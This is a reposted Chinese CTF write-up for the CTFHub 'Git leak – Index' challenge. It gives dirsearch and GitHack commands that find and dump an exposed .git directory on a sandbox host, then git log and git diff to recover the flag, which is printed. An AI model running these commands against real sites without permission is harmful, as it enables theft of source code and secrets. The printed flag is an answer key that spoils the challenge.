CTFHub Git泄露—Index解题思路笔记

Posted 曹振国cc

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CTFHub Git泄露—Index解题思路笔记相关的知识,希望对你有一定的参考价值。

一、开启环境

image-20210507203549454

1.使用dirsearch工具扫描目录

python3 dirsearch.py -u http://challenge-df934588d76028e3.sandbox.ctfhub.com:10080/

发现存在Git泄露

image-20210507203828160

2.使用GitHack工具

 python GitHack.py -u http://challenge-df934588d76028e3.sandbox.ctfhub.com:10080/.git

image-20210507204021619

3.打开文件夹查看历史文件

git log

image-20210507204247071

4.使用git diff比对文件

 git diff 255498e8351aea1277b4f0d4e41c38aa0e5d2c65	//发现flag

image-20210507204445078

五、FLAG

ctfhub{4bfd9b9f38c9b2fc0bf49339}

以上是关于CTFHub Git泄露—Index解题思路笔记的主要内容,如果未能解决你的问题,请参考以下文章

CTFHubGit泄露—Stash解题思路笔记

ctfhub git log泄露

ctfhub git log泄露

CTFHub 目录便利 解题思路

CTFHUB 信息泄露

CTFHUB-技能树-Web-信息泄露